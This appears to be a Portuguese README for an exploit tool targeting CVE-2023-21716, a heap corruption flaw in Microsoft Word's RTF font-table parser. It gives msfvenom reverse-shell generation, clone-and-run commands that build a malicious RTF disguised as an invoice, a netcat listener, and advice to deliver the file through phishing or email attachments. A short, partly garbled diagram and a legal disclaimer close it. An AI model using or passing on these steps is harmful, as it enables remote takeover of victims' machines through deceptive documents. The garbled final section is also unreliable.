
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
Gravidade: Crítica (CVSS 9.8)
Afetado: Microsoft Word 2013 / 2016 / 2019 / 2021 (não corrigido)
Correção: Microsoft Patch Tuesday de fevereiro de 2023
Autor: REGGYRAIDER
CVE-2023-21716 é uma vulnerabilidade de corrupção de heap no analisador RTF do Microsoft Word (wwlib.dll).
Quando o Word analisa uma diretiva \fonttbl contendo mais de 32.767 entradas de fonte, um contador interno de 16 bits com sinal transborda, corrompendo metadados do heap. Isso permite que um atacante obtenha Execução Remota de Código simplesmente enviando à vítima um arquivo .rtf manipulado.
Sem macros. Nenhuma interação do usuário além de abrir o arquivo.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
Carregue via SMB, anexo de e-mail ou qualquer vetor de phishing.
Quando a vítima abre invoice_march2024.rtf em um Word não corrigido, você recebe uma reverse shell.
Atacante cria RTF Word analisa \fonttbl Heap corrompido
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl com 32769+ Contador assinado 16-bit Shellcode do
definições de fonte transborda → 0x8000 atacante executado
\f<N> dentro de \fonttbl.payload.bin) é colocado dentro de \pict e cai na região corrompida, ganhando execução quando o alocador o processa.Esta ferramenta destina-se apenas a fins educacionais e testes de penetração autorizados.
Usar este exploit contra sistemas que você não possui ou que não tem permissão explícita por escrito para testar é ilegal.
O autor não assume responsabilidade por uso indevido.